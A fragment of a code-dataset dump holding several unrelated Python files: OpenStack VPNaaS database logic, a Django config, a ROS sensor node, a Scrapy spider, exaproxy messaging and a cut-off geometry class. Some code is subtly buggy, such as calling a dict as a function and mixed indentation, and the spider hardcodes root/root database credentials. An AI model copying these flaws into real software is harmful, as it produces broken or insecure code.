dpd_timeout=ipsec_sitecon['dpd_timeout'],\n admin_state_up=ipsec_sitecon['admin_state_up'],\n status=constants.PENDING_CREATE,\n vpnservice_id=ipsec_sitecon['vpnservice_id'],\n ikepolicy_id=ipsec_sitecon['ikepolicy_id'],\n ipsecpolicy_id=ipsec_sitecon['ipsecpolicy_id']\n )\n context.session.add(ipsec_site_conn_db)\n for cidr in ipsec_sitecon['peer_cidrs']:\n peer_cidr_db = IPsecPeerCidr(\n cidr=cidr,\n ipsec_site_connection_id=ipsec_site_conn_db['id']\n )\n context.session.add(peer_cidr_db)\n return self._make_ipsec_site_connection_dict(ipsec_site_conn_db)\n\n def update_ipsec_site_connection(\n self, context,\n ipsec_site_conn_id, ipsec_site_connection):\n ipsec_sitecon = ipsec_site_connection['ipsec_site_connection']\n dpd = ipsec_sitecon.get('dpd', {})\n if dpd.get('action'):\n ipsec_sitecon['dpd_action'] = dpd.get('action')\n if dpd.get('interval'):\n ipsec_sitecon['dpd_interval'] = dpd.get('interval')\n if dpd.get('timeout'):\n ipsec_sitecon['dpd_timeout'] = dpd.get('timeout')\n changed_peer_cidrs = False\n with context.session.begin(subtransactions=True):\n ipsec_site_conn_db = self._get_resource(\n context,\n IPsecSiteConnection,\n ipsec_site_conn_id)\n self.assert_update_allowed(ipsec_site_conn_db)\n if \"peer_cidrs\" in ipsec_sitecon:\n changed_peer_cidrs = True\n old_peer_cidr_list = ipsec_site_conn_db['peer_cidrs']\n old_peer_cidr_dict = dict(\n (peer_cidr['cidr'], peer_cidr)\n for peer_cidr in old_peer_cidr_list)\n new_peer_cidr_set = set(ipsec_sitecon[\"peer_cidrs\"])\n old_peer_cidr_set = set(old_peer_cidr_dict)\n\n new_peer_cidrs = list(new_peer_cidr_set)\n for peer_cidr in old_peer_cidr_set - new_peer_cidr_set:\n context.session.delete(old_peer_cidr_dict[peer_cidr])\n for peer_cidr in new_peer_cidr_set - old_peer_cidr_set:\n pcidr = IPsecPeerCidr(\n cidr=peer_cidr,\n ipsec_site_connection_id=ipsec_site_conn_id)\n context.session.add(pcidr)\n del ipsec_sitecon[\"peer_cidrs\"]\n if ipsec_sitecon:\n ipsec_site_conn_db.update(ipsec_sitecon)\n result = self._make_ipsec_site_connection_dict(ipsec_site_conn_db)\n if changed_peer_cidrs:\n result['peer_cidrs'] = new_peer_cidrs\n return result\n\n def delete_ipsec_site_connection(self, context, ipsec_site_conn_id):\n with context.session.begin(subtransactions=True):\n ipsec_site_conn_db = self._get_resource(\n context, IPsecSiteConnection, ipsec_site_conn_id\n )\n context.session.delete(ipsec_site_conn_db)\n\n def get_ipsec_site_connection(self, context,\n ipsec_site_conn_id, fields=None):\n ipsec_site_conn_db = self._get_resource(\n context, IPsecSiteConnection, ipsec_site_conn_id\n )\n return self._make_ipsec_site_connection_dict(\n ipsec_site_conn_db, fields)\n\n def get_ipsec_site_connections(self, context, filters=None, fields=None):\n return self._get_collection(context, IPsecSiteConnection,\n self._make_ipsec_site_connection_dict,\n filters=filters, fields=fields)\n\n def _make_ikepolicy_dict(self, ikepolicy, fields=None):\n res = {'id': ikepolicy['id'],\n 'tenant_id': ikepolicy['tenant_id'],\n 'name': ikepolicy['name'],\n 'description': ikepolicy['description'],\n 'auth_algorithm': ikepolicy['auth_algorithm'],\n 'encryption_algorithm': ikepolicy['encryption_algorithm'],\n 'phase1_negotiation_mode': ikepolicy['phase1_negotiation_mode'],\n 'lifetime': {\n 'units': ikepolicy['lifetime_units'],\n 'value': ikepolicy['lifetime_value'],\n },\n 'ike_version': ikepolicy['ike_version'],\n 'pfs': ikepolicy['pfs']\n }\n\n return self._fields(res, fields)\n\n def create_ikepolicy(self, context, ikepolicy):\n ike = ikepolicy['ikepolicy']\n tenant_id = self._get_tenant_id_for_create(context, ike)\n lifetime_info = ike.get('lifetime', [])\n lifetime_units = lifetime_info.get('units', 'seconds')\n lifetime_value = lifetime_info.get('value', 3600)\n\n with context.session.begin(subtransactions=True):\n ike_db = IKEPolicy(\n id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=ike['name'],\n description=ike['description'],\n auth_algorithm=ike['auth_algorithm'],\n encryption_algorithm=ike['encryption_algorithm'],\n phase1_negotiation_mode=ike['phase1_negotiation_mode'],\n lifetime_units=lifetime_units,\n lifetime_value=lifetime_value,\n ike_version=ike['ike_version'],\n pfs=ike['pfs']\n )\n\n context.session.add(ike_db)\n return self._make_ikepolicy_dict(ike_db)\n\n def update_ikepolicy(self, context, ikepolicy_id, ikepolicy):\n ike = ikepolicy['ikepolicy']\n with context.session.begin(subtransactions=True):\n ikepolicy = context.session.query(IPsecSiteConnection).filter_by(\n ikepolicy_id=ikepolicy_id).first()\n if ikepolicy:\n raise vpnaas.IKEPolicyInUse(ikepolicy_id=ikepolicy_id)\n ike_db = self._get_resource(context, IKEPolicy, ikepolicy_id)\n if ike:\n lifetime_info = ike.get('lifetime')\n if lifetime_info:\n if lifetime_info.get('units'):\n ike['lifetime_units'] = lifetime_info['units']\n if lifetime_info.get('value'):\n ike['lifetime_value'] = lifetime_info['value']\n ike_db.update(ike)\n return self._make_ikepolicy_dict(ike_db)\n\n def delete_ikepolicy(self, context, ikepolicy_id):\n with context.session.begin(subtransactions=True):\n ikepolicy = context.session.query(IPsecSiteConnection).filter_by(\n ikepolicy_id=ikepolicy_id).first()\n if ikepolicy:\n raise vpnaas.IKEPolicyInUse(ikepolicy_id=ikepolicy_id)\n ike_db = self._get_resource(context, IKEPolicy, ikepolicy_id)\n context.session.delete(ike_db)\n\n def get_ikepolicy(self, context, ikepolicy_id, fields=None):\n ike_db = self._get_resource(context, IKEPolicy, ikepolicy_id)\n return self._make_ikepolicy_dict(ike_db, fields)\n\n def get_ikepolicies(self, context, filters=None, fields=None):\n return self._get_collection(context, IKEPolicy,\n self._make_ikepolicy_dict,\n filters=filters, fields=fields)\n\n def _make_ipsecpolicy_dict(self, ipsecpolicy, fields=None):\n\n res = {'id': ipsecpolicy['id'],\n 'tenant_id': ipsecpolicy['tenant_id'],\n 'name': ipsecpolicy['name'],\n 'description': ipsecpolicy['description'],\n 'transform_protocol': ipsecpolicy['transform_protocol'],\n 'auth_algorithm': ipsecpolicy['auth_algorithm'],\n 'encryption_algorithm': ipsecpolicy['encryption_algorithm'],\n 'encapsulation_mode': ipsecpolicy['encapsulation_mode'],\n 'lifetime': {\n 'units': ipsecpolicy['lifetime_units'],\n 'value': ipsecpolicy['lifetime_value'],\n },\n 'pfs': ipsecpolicy['pfs']\n }\n\n return self._fields(res, fields)\n\n def create_ipsecpolicy(self, context, ipsecpolicy):\n ipsecp = ipsecpolicy['ipsecpolicy']\n tenant_id = self._get_tenant_id_for_create(context, ipsecp)\n lifetime_info = ipsecp['lifetime']\n lifetime_units = lifetime_info.get('units', 'seconds')\n lifetime_value = lifetime_info.get('value', 3600)\n\n with context.session.begin(subtransactions=True):\n ipsecp_db = IPsecPolicy(id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=ipsecp['name'],\n description=ipsecp['description'],\n transform_protocol=ipsecp['transform_'\n 'protocol'],\n auth_algorithm=ipsecp['auth_algorithm'],\n encryption_algorithm=ipsecp['encryption_'\n 'algorithm'],\n encapsulation_mode=ipsecp['encapsulation_'\n 'mode'],\n lifetime_units=lifetime_units,\n lifetime_value=lifetime_value,\n pfs=ipsecp['pfs'])\n context.session.add(ipsecp_db)\n return self._make_ipsecpolicy_dict(ipsecp_db)\n\n def update_ipsecpolicy(self, context, ipsecpolicy_id, ipsecpolicy):\n ipsecp = ipsecpolicy['ipsecpolicy']\n with context.session.begin(subtransactions=True):\n ipsecpolicy = context.session.query(IPsecSiteConnection).filter_by(\n ipsecpolicy_id=ipsecpolicy_id).first()\n if ipsecpolicy:\n raise vpnaas.IPsecPolicyInUse(ipsecpolicy_id=ipsecpolicy_id)\n ipsecp_db = self._get_resource(context,\n IPsecPolicy,\n ipsecpolicy_id)\n if ipsecp:\n lifetime_info = ipsecp.get('lifetime')\n if lifetime_info:\n if lifetime_info.get('units'):\n ipsecp['lifetime_units'] = lifetime_info['units']\n if lifetime_info('value'):\n ipsecp['lifetime_value'] = lifetime_info['value']\n ipsecp_db.update(ipsecp)\n return self._make_ipsecpolicy_dict(ipsecp_db)\n\n def delete_ipsecpolicy(self, context, ipsecpolicy_id):\n with context.session.begin(subtransactions=True):\n ipsecpolicy = context.session.query(IPsecSiteConnection).filter_by(\n ipsecpolicy_id=ipsecpolicy_id).first()\n if ipsecpolicy:\n raise vpnaas.IPsecPolicyInUse(ipsecpolicy_id=ipsecpolicy_id)\n ipsec_db = self._get_resource(context, IPsecPolicy, ipsecpolicy_id)\n context.session.delete(ipsec_db)\n\n def get_ipsecpolicy(self, context, ipsecpolicy_id, fields=None):\n ipsec_db = self._get_resource(context, IPsecPolicy, ipsecpolicy_id)\n return self._make_ipsecpolicy_dict(ipsec_db, fields)\n\n def get_ipsecpolicies(self, context, filters=None, fields=None):\n return self._get_collection(context, IPsecPolicy,\n self._make_ipsecpolicy_dict,\n filters=filters, fields=fields)\n\n def _make_vpnservice_dict(self, vpnservice, fields=None):\n res = {'id': vpnservice['id'],\n 'name': vpnservice['name'],\n 'description': vpnservice['description'],\n 'tenant_id': vpnservice['tenant_id'],\n 'subnet_id': vpnservice['subnet_id'],\n 'router_id': vpnservice['router_id'],\n 'admin_state_up': vpnservice['admin_state_up'],\n 'status': vpnservice['status']}\n return self._fields(res, fields)\n\n def create_vpnservice(self, context, vpnservice):\n vpns = vpnservice['vpnservice']\n tenant_id = self._get_tenant_id_for_create(context, vpns)\n with context.session.begin(subtransactions=True):\n vpnservice_db = VPNService(id=uuidutils.generate_uuid(),\n tenant_id=tenant_id,\n name=vpns['name'],\n description=vpns['description'],\n subnet_id=vpns['subnet_id'],\n router_id=vpns['router_id'],\n admin_state_up=vpns['admin_state_up'],\n status=constants.PENDING_CREATE)\n context.session.add(vpnservice_db)\n return self._make_vpnservice_dict(vpnservice_db)\n\n def update_vpnservice(self, context, vpnservice_id, vpnservice):\n vpns = vpnservice['vpnservice']\n with context.session.begin(subtransactions=True):\n vpnservice = context.session.query(IPsecSiteConnection).filter_by(\n vpnservice_id=vpnservice_id).first()\n if vpnservice:\n raise vpnaas.VPNServiceInUse(vpnservice_id=vpnservice_id)\n vpns_db = self._get_resource(context, VPNService, vpnservice_id)\n self.assert_update_allowed(vpns_db)\n if vpns:\n vpns_db.update(vpns)\n return self._make_vpnservice_dict(vpns_db)\n\n def delete_vpnservice(self, context, vpnservice_id):\n with context.session.begin(subtransactions=True):\n if context.session.query(IPsecSiteConnection).filter_by(\n vpnservice_id=vpnservice_id\n ).first():\n raise vpnaas.VPNServiceInUse(vpnservice_id=vpnservice_id)\n vpns_db = self._get_resource(context, VPNService, vpnservice_id)\n context.session.delete(vpns_db)\n\n def _get_vpnservice(self, context, vpnservice_id):\n return self._get_resource(context, VPNService, vpnservice_id)\n\n def get_vpnservice(self, context, vpnservice_id, fields=None):\n vpns_db = self._get_resource(context, VPNService, vpnservice_id)\n return self._make_vpnservice_dict(vpns_db, fields)\n\n def get_vpnservices(self, context, filters=None, fields=None):\n return self._get_collection(context, VPNService,\n self._make_vpnservice_dict,\n filters=filters, fields=fields)\n\n\nclass VPNPluginRpcDbMixin():\n def _get_agent_hosting_vpn_services(self, context, host):\n\n plugin = manager.NeutronManager.get_plugin()\n agent = plugin._get_agent_by_type_and_host(\n context, q_constants.AGENT_TYPE_L3, host)\n if not agent.admin_state_up:\n return []\n query = context.session.query(VPNService)\n query = query.join(IPsecSiteConnection)\n query = query.join(IKEPolicy)\n query = query.join(IPsecPolicy)\n query = query.join(IPsecPeerCidr)\n query = query.join(agent_db.RouterL3AgentBinding,\n agent_db.RouterL3AgentBinding.router_id ==\n VPNService.router_id)\n query = query.filter(\n agent_db.RouterL3AgentBinding.l3_agent_id == agent.id)\n return query\n\n def update_status_on_host(self, context, host, active_services):\n with context.session.begin(subtransactions=True):\n vpnservices = self._get_agent_hosting_vpn_services(\n context, host)\n for vpnservice in vpnservices:\n if vpnservice.id in active_services:\n if vpnservice.status != constants.ACTIVE:\n vpnservice.status = constants.ACTIVE\n else:\n if vpnservice.status != constants.ERROR:\n vpnservice.status = constants.ERROR\n"} {"ext": "py", "sha": "1a309b0dbd6724579412ec2288ca3428dd5cc8ff", "content": "from django.apps import AppConfig\n\nclass HomepageConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'HomePage'\n"} {"ext": "py", "sha": "1a309c0bf5e3492325e1877ea80da1d70cb95bad", "content": "#!/usr/bin/env python\nimport ads1256\nimport time\nimport rospy\nfrom std_msgs.msg import Float32\n\ndef ReadValues():\n\trate = 25 # Frequency in Hz\n\t\n\tads1256.start(\"1\",str(rate))\n\tpub = rospy.Publisher('/sen_4/ResVal', Float32, tcp_nodelay=False, queue_size=1)\n\trospy.init_node('Rheostat',anonymous=True)\n\trate=rospy.Rate(10)\n\twhile not rospy.is_shutdown():\n\t\tabsoluteValue = ads1256.read_channel(0)\n\t\tvoltage = ((absoluteValue*100)/167.0)/1000000.0\n\t\trospy.loginfo(voltage)\n\t\tpub.publish(voltage)\n\t\trate.sleep()\n\tads1256.stop()\n\t\nif __name__== '__main__':\n\ttry:\n\t\tReadValues()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n"} {"ext": "py", "sha": "1a309c4b9d856791dc2b8413bfabe6d8af9e92b0", "content": "from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import HtmlXPathSelector\n\n# from nypbot.utils import normalizeFriendlyDate\n\n\nfrom dateutil.parser import parse\n\n\nimport pymysql.cursors\n\n\n\nanswers = open('answers.csv', 'a')\n\nclass AcceptedAnswerSpider(CrawlSpider):\n name = \"acceptedanswer\"\n allowed_domains = [\"stackoverflow.com\"]\n start_urls = [\n \"http://stackoverflow.com/search?q=regular+expression\"\n ]\n rules = (\n # Extract links matching 'garage-sales-18/.*html' (but not matching 'subsection.php')\n # and follow links from them (since no callback means follow=True by default).\n Rule(SgmlLinkExtractor(allow=('questions/[0-9]+/.*', )), callback='parse_item', follow=True),\n\n )\n\n\n \n def insert_item(self,item):\n connection = pymysql.connect(host='localhost',\n user='root',\n password='root',\n db='stackoverflow',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n try:\n with connection.cursor() as cursor:\n # Create a new record\n\t\tsql = \"INSERT INTO `acceptedanswer` (`url`, `pre`, `time_posted`, `author`, `vote`) VALUES (%s, %s, %s, %s, %s)\"\n cursor.execute(sql, (item['url'], item['pre_text'], item['time_posted'], item['author'], item['vote']))\n\n # connection is not autocommit by default. So you must commit to save\n # your changes.\n connection.commit()\n\n finally:\n connection.close()\n return\n \n \"\"\"\n When writing crawl spider rules, avoid using parse as callback, since the CrawlSpider uses the parse method itself to implement its logic. So if you override the parse method, the crawl spider will no longer work.\n \"\"\"\n\n def parse_item(self, response):\n global answers\n hxs = HtmlXPathSelector(response)\n posts = hxs.select(\"//div[@id='answers']/div[@class='answer accepted-answer']\")\n items = []\n\n\n for post in posts:\n # print(post)\n item = {}\n\t item['url'] = response.url\n item['pre_text'] = ''.join(post.select(\".//div[@class='post-text']//pre//text()\").extract())\n item['time_posted'] = parse(post.select(\".//div[@class='user-action-time']//span/text()\").extract()[0])\n\t item['author']= ''.join(post.select(\".//div[@class='user-details']//a/text()\").extract())\n\t item['vote']=''.join(post.select(\".//div[@class='vote']//span[@class='vote-count-post ' or @class='vote-count-post high-scored-post']/text()\").extract())\n\n\n\n self.insert_item(item)\n items.append(item)\n # self.insert_posts(items)\n #for item in items:\n # print >> answers, \"%s,'%s'\\n\" % (item['url'], item['pre_text'])\n return items\n\n\n\n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a309d590d3f84ab72befcb77bab4171cb27c91e", "content": "from .preprocess import *\nfrom .toolkit import *\n\n\nname = 'xshinnosuke-utils'\n"} {"ext": "py", "sha": "1a309e3b08aa0399280cf8acd9dcc3ad6a979bc9", "content": "\"\"\"\nUtility functions used in the logistic regression classifier.\n\n@copyright: The Broad Institute of MIT and Harvard 2015\n\"\"\"\n\nimport numpy as np\n\ndef sigmoid(v):\n return 1 / (1 + np.exp(-v))\n\n\"\"\"Computes a prediction (in the form of probabilities) for the given data vector\n\"\"\"\ndef predict(x, theta):\n p = sigmoid(np.dot(x, theta))\n return np.array([p])\n\n\"\"\"Return a function that gives a prediction from a design matrix row\n\"\"\"\ndef gen_predictor(params_filename=\"./models/test/lreg-params\"):\n with open(params_filename, \"rb\") as pfile:\n lines = pfile.readlines()\n N = len(lines)\n theta = np.ones(N)\n i = 0\n for line in lines:\n theta[i] = float(line.strip().split(' ')[1])\n i = i + 1\n\n def predictor(X):\n scores = []\n for i in range(0, len(X)):\n scores.extend(predict(X[i,:], theta))\n return scores\n return predictor\n"} {"ext": "py", "sha": "1a309e67741766cdb11d02c91dcac357612e8e59", "content": "# encoding: utf-8\n\"\"\"\nmessagebox.py\n\nCreated by David Farrar on 2014-06-10 (or earlier).\nCopyright (c) 2011-2013 Exa Networks. All rights reserved.\n\"\"\"\n\nfrom exaproxy.util.messagebox import MessageBox\nfrom exaproxy.util.control import ControlBox\n\nclass ProxyToRedirectorMessageBox:\n\tdef __init__ (self, pid, pipe_in, pipe_out, control_in, control_out):\n\t\tself.pid = pid\n\t\tself.box = MessageBox(pipe_in, pipe_out)\n\t\tself.control = ControlBox(control_in, control_out)\n\n\tdef close (self):\n\t\treturn self.box.close()\n\n\tdef sendRequest (self, client_id, peer, request, subrequest, source):\n\t\tmessage = client_id, peer, request, subrequest, source\n\t\treturn self.box.put(message)\n\n\tdef getDecision (self):\n\t\tmessage = self.box.get()\n\t\tif message is not None:\n\t\t\tclient_id, command, decision = message\n\n\t\telse:\n\t\t\tclient_id, command, decision = None, None, None\n\n\t\treturn client_id, command, decision\n\n\tdef stop (self):\n\t\tself.control.send('STOP')\n\t\treturn self.control.wait_stop()\n\n\tdef respawn (self):\n\t\tself.control.send('RESPAWN')\n\n\tdef decreaseSpawnLimit (self, count=1):\n\t\tself.control.send('DECREASE', count)\n\n\tdef increaseSpawnLimit (self, count=1):\n\t\tself.control.send('INCREASE', count)\n\n\tdef getStats (self):\n\t\tidentifier = self.control.send('STATS')\n\t\treturn self.control.receive(identifier)\n\n\n\nclass RedirectorToProxyMessageBox:\n\tdef __init__ (self, pipe_in, pipe_out):\n\t\tself.box = MessageBox(pipe_in, pipe_out)\n\n\tdef close (self):\n\t\treturn self.box.close()\n\n\tdef isClosed (self):\n\t\treturn self.box.pipe_in.closed\n\n\tdef getRequest (self):\n\t\treturn self.box.get()\n\n\tdef sendResponse (self, client_id, command, decision):\n\t\tmessage = client_id, command, decision\n\t\treturn self.box.put(message)\n"} {"ext": "py", "sha": "1a309f1dd4064d85705312705c4bda4ad271ebcb", "content": "import os\nimport pytest\n\n\n@pytest.fixture(autouse=True, scope='function')\ndef setup():\n os.environ.pop('PYPINYIN_NO_PHRASES', None)\n os.environ.pop('PYPINYIN_NO_DICT_COPY', None)\n try:\n yield\n finally:\n os.environ.pop('PYPINYIN_NO_PHRASES', None)\n os.environ.pop('PYPINYIN_NO_DICT_COPY', None)\n"} {"ext": "py", "sha": "1a30a10b822bc458422e76b0e320768758d78dd3", "content": "import numpy as np\nimport matplotlib.pyplot as plt\nimport sectionproperties.pre.pre as pre\nimport sectionproperties.post.post as post\n\n\nclass Geometry:\n \"\"\"Parent class for a cross-section geometry input.\n\n Provides an interface for the user to specify the geometry defining a cross-section. A method\n is provided for generating a triangular mesh, for translating the cross-section by *(x, y)* and\n for plotting the geometry.\n\n :cvar points: List of points *(x, y)* defining the vertices of the cross-section\n :vartype points: list[list[float, float]]\n :cvar facets: List of point index pairs *(p1, p2)* defining the edges of the cross-section\n :vartype facets: list[list[int, int]]\n :cvar holes: List of points *(x, y)* defining the locations of holes within the cross-section.\n If there are no holes, provide an empty list [].\n :vartype holes: list[list[float, float]]\n :cvar control_points: A list of points *(x, y)* that define different regions of the\n cross-section. A control point is an arbitrary point within a region enclosed by facets.\n :vartype control_points: list[list[float, float]]\n :cvar shift: Vector that shifts the cross-section by *(x, y)*\n :vartype shift: list[float, float]\n :cvar perimeter: List of facet indices defining the perimeter of the cross-section\n :vartype perimeter: list[int]\n \"\"\"\n\n def __init__(self, control_points, shift):\n \"\"\"Inits the Geometry class.\"\"\"\n\n self.control_points = control_points\n self.shift = shift\n self.points = []\n self.facets = []\n self.holes = []\n self.perimeter = []\n\n def create_mesh(self, mesh_sizes):\n \"\"\"Creates a quadratic triangular mesh from the Geometry object.\n\n :param mesh_sizes: A list of maximum element areas corresponding to each region within the\n cross-section geometry.\n :type mesh_size: list[float]\n\n :return: Object containing generated mesh data\n :rtype: :class:`meshpy.triangle.MeshInfo`\n\n :raises AssertionError: If the number of mesh sizes does not match the number of regions\n\n The following example creates a circular cross-section with a diameter of 50 with 64\n points, and generates a mesh with a maximum triangular area of 2.5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CircularSection(d=50, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[2.5])\n\n .. figure:: ../images/sections/circle_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n str = \"Number of mesh_sizes ({0}), should match the number of regions ({1})\".format(\n len(mesh_sizes), len(self.control_points)\n )\n assert(len(mesh_sizes) == len(self.control_points)), str\n\n return pre.create_mesh(\n self.points, self.facets, self.holes, self.control_points, mesh_sizes)\n\n def shift_section(self):\n \"\"\"Shifts the cross-section parameters by the class variable vector *shift*.\"\"\"\n\n for point in self.points:\n point[0] += self.shift[0]\n point[1] += self.shift[1]\n\n for hole in self.holes:\n hole[0] += self.shift[0]\n hole[1] += self.shift[1]\n\n for cp in self.control_points:\n cp[0] += self.shift[0]\n cp[1] += self.shift[1]\n\n def rotate_section(self, angle, rot_point=None):\n \"\"\"Rotates the geometry and specified angle about a point. If the rotation point is not\n provided, rotates the section about the first control point in the list of control points\n of the :class:`~sectionproperties.pre.sections.Geometry` object.\n\n :param float angle: Angle (degrees) by which to rotate the section. A positive angle leads\n to a counter-clockwise rotation.\n :param rot_point: Point *(x, y)* about which to rotate the section\n :type rot_point: list[float, float]\n\n The following example rotates a 200UB25 section clockwise by 30 degrees::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.ISection(d=203, b=133, t_f=7.8, t_w=5.8, r=8.9, n_r=8)\n geometry.rotate_section(angle=-30)\n \"\"\"\n\n # convert angle to radians\n rot_phi = angle * np.pi / 180\n\n def get_r(pt1, pt2):\n \"\"\"Returns the distance between two points.\"\"\"\n\n return ((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2) ** 0.5\n\n def get_phi(pt1, pt2):\n \"\"\"Returns the angle between two points.\"\"\"\n\n return np.arctan2(pt1[1] - pt2[1], pt1[0] - pt2[0])\n\n def rotate_point(pt, rot_point, rot_phi):\n \"\"\"Rotates a point given a rotation point and rotation angle.\"\"\"\n\n r = get_r(pt, rot_point)\n phi = get_phi(pt, rot_point)\n\n pt[0] = r * np.cos(phi + rot_phi) + rot_point[0]\n pt[1] = r * np.sin(phi + rot_phi) + rot_point[1]\n\n # use the first control point if no rotation point is specified\n if rot_point is None:\n rot_point = self.control_points[0]\n\n # rotate all the points\n for point in self.points:\n rotate_point(point, rot_point, rot_phi)\n\n # rotate all the holes\n for hole in self.holes:\n rotate_point(hole, rot_point, rot_phi)\n\n # rotate all the control points\n for cp in self.control_points:\n rotate_point(cp, rot_point, rot_phi)\n\n def mirror_section(self, axis='x', mirror_point=None):\n \"\"\"Mirrors the geometry about a point on either the x or y-axis. If no point is provided,\n mirrors the geometry about the first control point in the list of control points of the\n :class:`~sectionproperties.pre.sections.Geometry` object.\n\n :param string axis: Axis about which to mirror the geometry, *'x'* or *'y'*\n :param mirror_point: Point about which to mirror the geometry *(x, y)*\n :type mirror_point: list[float, float]\n\n The following example mirrors a 200PFC section about the y-axis and the point (0, 0)::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.PfcSection(d=200, b=75, t_f=12, t_w=6, r=12, n_r=8)\n geometry.mirror_section(axis='y', mirror_point=[0, 0])\n \"\"\"\n\n # use the first control point if no mirror point is specified\n if mirror_point is None:\n mirror_point = self.control_points[0]\n\n # select the axis to mirror\n if axis == 'x':\n i = 1\n elif axis == 'y':\n i = 0\n else:\n raise RuntimeError(\"Enter a valid axis: 'x' or 'y'\")\n\n # mirror all points\n for point in self.points:\n point[i] = 2 * mirror_point[i] - point[i]\n\n # mirror all holes\n for hole in self.holes:\n hole[i] = 2 * mirror_point[i] - hole[i]\n\n # mirror all control points\n for cp in self.control_points:\n cp[i] = 2 * mirror_point[i] - cp[i]\n\n def add_point(self, point):\n \"\"\"Adds a point to the geometry and returns the added point id.\n\n :param point: Location of the point\n :type point: list[float, float]\n :return: Point id\n :rtype: int\n \"\"\"\n\n self.points.append(point)\n return len(self.points) - 1\n\n def add_facet(self, facet):\n \"\"\"Adds a facet to the geometry and returns the added facet id.\n\n :param facet: Point indices of the facet\n :type facet: list[float, float]\n :return: Facet id\n :rtype: int\n \"\"\"\n\n self.facets.append(facet)\n return len(self.facets) - 1\n\n def add_hole(self, hole):\n \"\"\"Adds a hole location to the geometry and returns the added hole id.\n\n :param hole: Location of the hole\n :type hole: list[float, float]\n :return: Hole id\n :rtype: int\n \"\"\"\n\n self.holes.append(hole)\n return len(self.holes) - 1\n\n def add_control_point(self, control_point):\n \"\"\"Adds a control point to the geometry and returns the added control\n point id.\n\n :param hole: Location of the control point\n :type hole: list[float, float]\n :return: Control point id\n :rtype: int\n \"\"\"\n\n self.control_points.append(control_point)\n return len(self.control_points) - 1\n\n def clean_geometry(self, verbose=False):\n \"\"\"Peforms a full clean on the geometry.\n\n :param bool verbose: If set to true, information related to the geometry cleaning process\n is printed to the terminal.\n\n .. note:: Cleaning the geometry is always recommended when creating a merged section,\n which may result in overlapping or intersecting facets, or duplicate nodes.\n \"\"\"\n\n self = pre.GeometryCleaner(self, verbose).clean_geometry()\n\n def plot_geometry(self, ax=None, pause=True, labels=False, perimeter=False):\n \"\"\"Plots the geometry defined by the input section. If no axes object is supplied a new\n figure and axis is created.\n\n :param ax: Axes object on which the mesh is plotted\n :type ax: :class:`matplotlib.axes.Axes`\n :param bool pause: If set to true, the figure pauses the script until the window is closed.\n If set to false, the script continues immediately after the window is rendered.\n :param bool labels: If set to true, node and facet labels are displayed\n :param bool perimeter: If set to true, boldens the perimeter of the cross-section\n\n :return: Matplotlib figure and axes objects (fig, ax)\n :rtype: (:class:`matplotlib.figure.Figure`, :class:`matplotlib.axes`)\n\n The following example creates a CHS discretised with 64 points, with a diameter of 48 and\n thickness of 3.2, and plots the geometry::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.Chs(d=48, t=3.2, n=64)\n geometry.plot_geometry()\n\n .. figure:: ../images/sections/chs_geometry.png\n :align: center\n :scale: 75 %\n\n Geometry generated by the above example.\n \"\"\"\n\n # if no axes object is supplied, create and setup the plot\n if ax is None:\n ax_supplied = False\n (fig, ax) = plt.subplots()\n post.setup_plot(ax, pause)\n else:\n ax_supplied = True\n\n for (i, f) in enumerate(self.facets):\n if perimeter:\n if i in self.perimeter:\n linewidth = 3\n else:\n linewidth = 1.5\n else:\n linewidth = 1.5\n\n # plot the points and facets\n if i == 0:\n ax.plot([self.points[f[0]][0], self.points[f[1]][0]],\n [self.points[f[0]][1], self.points[f[1]][1]],\n 'ko-', markersize=2, linewidth=linewidth, label='Points & Facets')\n else:\n ax.plot([self.points[f[0]][0], self.points[f[1]][0]],\n [self.points[f[0]][1], self.points[f[1]][1]],\n 'ko-', markersize=2, linewidth=linewidth)\n\n for (i, h) in enumerate(self.holes):\n # plot the holes\n if i == 0:\n ax.plot(h[0], h[1], 'rx', markersize=5, label='Holes')\n else:\n ax.plot(h[0], h[1], 'rx', markersize=5)\n\n for (i, cp) in enumerate(self.control_points):\n # plot the control points\n if i == 0:\n ax.plot(cp[0], cp[1], 'bo', markersize=5,\n label='Control Points')\n else:\n ax.plot(cp[0], cp[1], 'bo', markersize=5)\n\n # display the legend\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n # display the labels\n if labels:\n # plot node labels\n for (i, pt) in enumerate(self.points):\n ax.annotate(str(i), xy=pt, color='r')\n\n # plot facet labels\n for (i, fct) in enumerate(self.facets):\n pt1 = self.points[fct[0]]\n pt2 = self.points[fct[1]]\n xy = [(pt1[0] + pt2[0]) / 2, (pt1[1] + pt2[1]) / 2]\n\n ax.annotate(str(i), xy=xy, color='b')\n\n # if no axes object is supplied, finish the plot\n if not ax_supplied:\n post.finish_plot(ax, pause, title='Cross-Section Geometry')\n return (fig, ax)\n\n def calculate_extents(self):\n \"\"\"Calculates the minimum and maximum x and y-values amongst the list of points.\n\n :return: Minimum and maximum x and y-values *(x_min, x_max, y_min, y_max)*\n :rtype: tuple(float, float, float, float)\n \"\"\"\n\n # loop through all points\n for (i, pt) in enumerate(self.points):\n x = pt[0]\n y = pt[1]\n\n # initialise min, max variables\n if i == 0:\n x_min = x\n x_max = x\n y_min = y\n y_max = y\n\n # update the mins and maxs where necessary\n x_min = min(x_min, x)\n x_max = max(x_max, x)\n y_min = min(y_min, y)\n y_max = max(y_max, y)\n\n return (x_min, x_max, y_min, y_max)\n\n def draw_radius(self, pt, r, theta, n, anti=True):\n \"\"\"Adds a quarter radius of points to the points list - centered at point *pt*, with radius\n *r*, starting at angle *theta*, with *n* points. If r = 0, adds pt only.\n\n :param pt: Centre of radius *(x,y)*\n :type pt: list[float, float]\n :param float r: 